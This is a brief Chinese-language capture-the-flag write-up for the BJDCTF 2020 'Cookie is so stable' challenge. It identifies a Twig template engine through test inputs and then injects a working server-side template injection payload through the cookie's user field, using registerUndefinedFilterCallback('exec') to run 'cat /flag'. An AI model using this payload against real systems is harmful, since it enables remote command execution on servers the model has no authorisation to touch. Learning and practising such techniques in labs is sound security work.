[BJDCTF 2020]Cookie is so stable
BJDCTF 2020]The mystery of ip 和这一题用的是同一个前端模板,而且同样是模板注入,只不过模板的类型不一样。
在 Flag 页面经过测试 ${7*7}
, {{7*7}}
, {{7*'7'}}
后能够确定为 Twig 模板引擎
尝试RCE ,发现似乎会检测输入的内容
但是观察到 cookie 的 user 字段记录了输入的内容,尝试在 cookie 进行注入
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
刷新网页即可。